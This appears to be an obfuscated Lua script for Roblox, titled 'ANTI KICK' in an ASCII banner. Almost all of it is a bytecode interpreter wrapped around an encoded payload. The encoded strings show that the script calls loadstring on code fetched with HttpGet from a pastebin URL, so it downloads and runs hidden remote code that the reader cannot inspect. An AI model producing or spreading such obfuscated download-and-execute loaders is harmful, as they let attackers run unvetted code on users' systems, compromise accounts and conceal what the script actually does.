--[[

   db    88b 88 888888 88     88  dP 88  dP""b8 88  dP 
  dPYb   88Yb88   88   88     88odP  88 dP   `" 88odP  
 dP__Yb  88 Y88   88   88     88"Yb  88 Yb      88"Yb  
dP""""Yb 88  Y8   88   88     88  Yb 88  YboodP 88  Yb 


]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v87=0;while true do if (v87==0) then v19=v0(v3(v30,1,1));return "";end end else local v88=v2(v0(v30,16));if v19 then local v110=0;local v111;while true do if (v110==1) then return v111;end if (v110==0) then v111=v5(v88,v19);v19=nil;v110=1;end end else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-((1 + 1) -1))) + (620 -(555 + 64)))) ;return v89-(v89%((1809 -(282 + 595)) -(857 + 74))) ;else local v90=(570 -((2004 -(1523 + 114)) + 201))^(v32-1) ;return (((v31%(v90 + v90))>=v90) and (928 -(193 + 21 + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23() local v37=(214 -97) -(32 + 85) ;local v38;local v39;local v40;local v41;while true do if (v37==(1 + 0)) then return (v41 * 16777216) + (v40 * 65536) + (v39 * (57 + 199)) + v38 ;end if (v37==((1307 -(87 + 263)) -(892 + 65))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (9 -5) ;v37=1 -0 ;end end end local function v24() local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,1 -0 ,200 -(67 + 113) ) * ((2 + 0)^32)) + v42 ;local v46=v20(v43,51 -30 ,31 + 0 );local v47=((v20(v43,24 + 8 )==(3 -(1 + 1))) and  -(3 -2)) or (953 -(802 + 150)) ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * (0 + 0 + 0) ;else v46=3 -(774 -(201 + 571)) ;v44=997 -(915 + 82) ;end elseif (v46==2047) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1461 -(145 + 293)) ) * (v44 + (v45/((1189 -(1069 + 118))^((1255 -(116 + 1022)) -65)))) ;end local function v25(v48) local v49=0 -0 ;local v50;local v51;while true do if (v49==((886 -(261 + 624)) + 0)) then v50=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;v49=2;end if (v49==(7 -5)) then v51={};for v112=860 -(814 + 45) , #v50 do v51[v112]=v2(v1(v3(v50,v112,v112)));end v49=7 -4 ;end if (v49==0) then v50=nil;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=1;end if (v49==(2 + (1 -0))) then return v6(v51);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98,v99) local v100=(function() return 836 -(660 + 176) ;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do local v109=(function() return 0;end)();while true do if (v109==0) then if (v100~=(1 + 0)) then else local v120=(function() return 202 -(14 + 188) ;end)();while true do if ((675 -(534 + 141))==v120) then while true do if (v91~=0) then else v92=(function() return v93();end)();if (v94(v92, #"!", #">")==(0 + 0)) then local v168=(function() return 0 -0 ;end)();local v169=(function() return;end)();local v170=(function() return;end)();local v171=(function() return;end)();local v172=(function() return;end)();while true do if (v168~=0) then else v169=(function() return 241 -(187 + 54) ;end)();v170=(function() return nil;end)();v168=(function() return 1 + 0 ;end)();end if (v168==(781 -(162 + 618))) then local v173=(function() return 0 + 0 ;end)();while true do if (v173==(0 + 0)) then v171=(function() return nil;end)();v172=(function() return nil;end)();v173=(function() return 1 -0 ;end)();end if (v173==(1 -0)) then v168=(function() return 5 -3 ;end)();break;end end end if ((2 + 0)==v168) then while true do if (v169~= #"-19") then else if (v94(v171, #"asd", #"91(")== #",") then v172[ #"asd1"]=(function() return v95[v172[ #"0836"]];end)();end v96[v97]=(function() return v172;end)();break;end if ( #"<"==v169) then local v175=(function() return 0 -0 ;end)();while true do if (v175~=0) then else v172=(function() return {v98(),v98(),nil,nil};end)();if (v170==(396 -(115 + 281))) then local v180=(function() return 1000 -(451 + 549) ;end)();while true do if (v180==0) then v172[ #"19("]=(function() return v98();end)();v172[ #"0313"]=(function() return v98();end)();break;end end elseif (v170== #",") then v172[ #"xnx"]=(function() return v99();end)();elseif (v170==2) then v172[ #"19("]=(function() return v99() -((4 -2)^(24 -8)) ;end)();elseif (v170~= #"19(") then else local v187=(function() return 0 + 0 ;end)();while true do if (v187==(1384 -(746 + 638))) then v172[ #"xxx"]=(function() return v99() -(2^16) ;end)();v172[ #"xnxx"]=(function() return v98();end)();break;end end end v175=(function() return 1 + 0 ;end)();end if (v175==(1 -0)) then v169=(function() return 343 -(218 + 123) ;end)();break;end end end if (v169~=0) then else local v176=(function() return 0;end)();while true do if (v176==1) then v169=(function() return  #",";end)();break;end if (0~=v176) then else v170=(function() return v94(v92,1583 -(1535 + 46) , #"nil");end)();v171=(function() return v94(v92, #"0836",14 -8 );end)();v176=(function() return 3 -2 ;end)();end end end if (v169==2) then local v177=(function() return 867 -(550 + 317) ;end)();local v178=(function() return;end)();while true do if ((0 -0)==v177) then v178=(function() return 0;end)();while true do if (v178==(560 -(306 + 254))) then if (v94(v171, #"!", #"|")~= #"|") then else v172[2 -0 ]=(function() return v95[v172[1 + 1 ]];end)();end if (v94(v171,3 -1 ,1469 -(899 + 568) )== #":") then v172[ #"xxx"]=(function() return v95[v172[ #"-19"]];end)();end v178=(function() return 1;end)();end if (v178~=1) then else v169=(function() return  #"xxx";end)();break;end end break;end end end end break;end end end break;end end return v91,v92,v93,v94,v95,v96,v97,v98,v99;end end end if (v100==(0 + 0)) then local v121=(function() return 0 -0 ;end)();while true do if (v121==(286 -(134 + 151))) then v100=(function() return 1;end)();break;end if (v121==(290 -(60 + 230))) then v91=(function() return 572 -(426 + 146) ;end)();v92=(function() return nil;end)();v121=(function() return 1 + 0 ;end)();end end end break;end end end end;end)();local v53=(function() return function(v101,v102,v103) local v104=(function() return 0;end)();local v105=(function() return;end)();while true do if (v104==(1665 -(970 + 695))) then v105=(function() return 0;end)();while true do if (v105~=(1456 -(282 + 1174))) then else local v122=(function() return 811 -(569 + 242) ;end)();while true do if (v122==(0 -0)) then v101[v102-#"\\" ]=(function() return v103();end)();return v101,v102,v103;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #" ",v58 do local v68=(function() return 0;end)();local v69=(function() return;end)();local v70=(function() return;end)();while true do if (v68==0) then local v114=(function() return 0;end)();while true do if ((1991 -(582 + 1408))~=v114) then else v68=(function() return 1025 -(706 + 318) ;end)();break;end if (v114~=0) then else v69=(function() return v21();end)();v70=(function() return nil;end)();v114=(function() return 1;end)();end end end if ((3 -2)~=v68) then else if (v69== #"]") then v70=(function() return v21()~=0 ;end)();elseif (v69==2) then v70=(function() return v24();end)();elseif (v69~= #"-19") then else v70=(function() return v25();end)();end v59[v67]=(function() return v70;end)();break;end end end v57[ #"nil"]=(function() return v21();end)();for v71= #"[",v23() do FlatIdent_39B0,Descriptor,v21,v20,v59,v54,v71,v22,v23=(function() return v52(FlatIdent_39B0,Descriptor,v21,v20,v59,v54,v71,v22,v23);end)();end for v72= #"<",v23() do v55,v72,v28=(function() return v53(v55,v72,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[1273 -(945 + (802 -(41 + 435))) ];local v66=v61[2 + 1 ];return function(...) local v73=v64;local v74=v65;local v75=v66;local v76=v27;local v77=2 -1 ;local v78= -(1 + 0);local v79={};local v80={...};local v81=v12("#",...) -(127 -(116 + 8 + 2)) ;local v82={};local v83={};for v106=(1975 -(1913 + 62)) + 0 ,v81 do if ((v106>=v75) or (164>=2785)) then v79[v106-v75 ]=v80[v106 + 1 ];else v83[v106]=v80[v106 + (1501 -(1408 + 92)) ];end end local v84=(v81-v75) + (1087 -(461 + 625)) ;local v85;local v86;while true do v85=v73[v77];v86=v85[1289 -(993 + 295) ];if (v86<=(1 + 4)) then if ((v86<=(1173 -(418 + 475 + 278))) or (525==2109)) then if (v86<=(0 + 0)) then local v123=v85[(10 -6) -2 ];local v124=v83[v85[1 + 2 ]];v83[v123 + 1 + 0 ]=v124;v83[v123]=v124[v85[2 + 2 ]];elseif (v86==(530 -(406 + 123))) then v83[v85[(1938 -(565 + 1368)) -3 ]]=v29(v74[v85[1772 -(1749 + 20) ]],nil,v63);else v83[v85[9 -7 ]]();end elseif ((33==33) and (v86<=(1 + (1003 -(938 + 63))))) then v83[v85[(1019 + 305) -(1249 + 73) ]]={};elseif (v86==(2 + 2)) then local v133=v85[1147 -((1752 -1286) + 679) ];local v134,v135=v76(v83[v133](v13(v83,v133 + (2 -(1662 -(1477 + 184))) ,v85[3 + 0 ])));v78=(v135 + v133) -((1126 -(936 + 189)) + 0) ;local v136=(0 -0) -0 ;for v162=v133,v78 do v136=v136 + (1901 -(106 + 1794)) ;v83[v162]=v134[v136];end else local v137;local v138,v139;local v140;local v141;v83[v85[1 + 1 ]]=v63[v85[3]];v77=v77 + 1 + 0 ;v85=v73[v77];v83[v85[(2 + 3) -3 ]]=v63[v85[3]];v77=v77 + (2 -1) ;v85=v73[v77];v141=v85[116 -(4 + 110) ];v140=v83[v85[14 -(1624 -(1565 + 48)) ]];v83[v141 + (585 -(57 + 527)) ]=v140;v83[v141]=v140[v85[4]];v77=v77 + (1428 -(41 + 1386)) ;v85=v73[v77];v83[v85[105 -(17 + 81 + 5) ]]=v85[(823 + 509) -(797 + 532) ];v77=v77 + 1 + (1138 -(782 + 356)) ;v85=v73[v77];v141=v85[3 -(268 -(176 + 91)) ];v138,v139=v76(v83[v141](v13(v83,v141 + (2 -1) ,v85[2 + 1 ])));v78=(v139 + v141) -(167 -(122 + 44)) ;v137=0 -0 ;for v165=v141,v78 do v137=v137 + (1203 -((971 -598) + 829)) ;v83[v165]=v138[v137];end v77=v77 + ((4 -1) -2) ;v85=v73[v77];v141=v85[733 -(476 + 255) ];v83[v141]=v83[v141](v13(v83,v141 + (1131 -((1225 -(564 + 292)) + 761)) ,v78));v77=v77 + 1 + 0 ;v85=v73[v77];v83[v85[1 + 1 ]]();v77=v77 + (1 -0) ;v85=v73[v77];do return;end end elseif ((3054<=4015) and (v86<=(73 -(30 + (1127 -(975 + 117)))))) then if (v86<=(1 + 5)) then v83[v85[(2 -0) + 0 ]]=v83[v85[(3797 -2537) -(1043 + 214) ]][v85[(319 -(244 + 60)) -11 ]];elseif (v86>(1219 -(323 + 889))) then v83[v85[5 -3 ]]=v85[(2458 -(157 + 1718)) -(293 + 68 + 219) ];else v83[v85[322 -(53 + 267) ]]=v63[v85[1 + (6 -4) ]];end elseif (v86<=9) then local v131=v85[415 -(12 + 3 + 398) ];v83[v131](v83[v131 + 1 ]);elseif (v86>(992 -(18 + 964))) then do return;end else local v159=v85[7 -5 ];v83[v159]=v83[v159](v13(v83,v159 + 1 ,v78));end v77=v77 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!013Q0003053Q007063612Q6C00054Q00037Q001207000100013Q00020100026Q00090001000200012Q000B3Q00013Q00013Q00023Q0003043Q007461736B03053Q00737061776E00053Q0012073Q00013Q0020065Q000200020100016Q00093Q000200012Q000B3Q00013Q00013Q00043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F7155796B7537553400083Q0012053Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
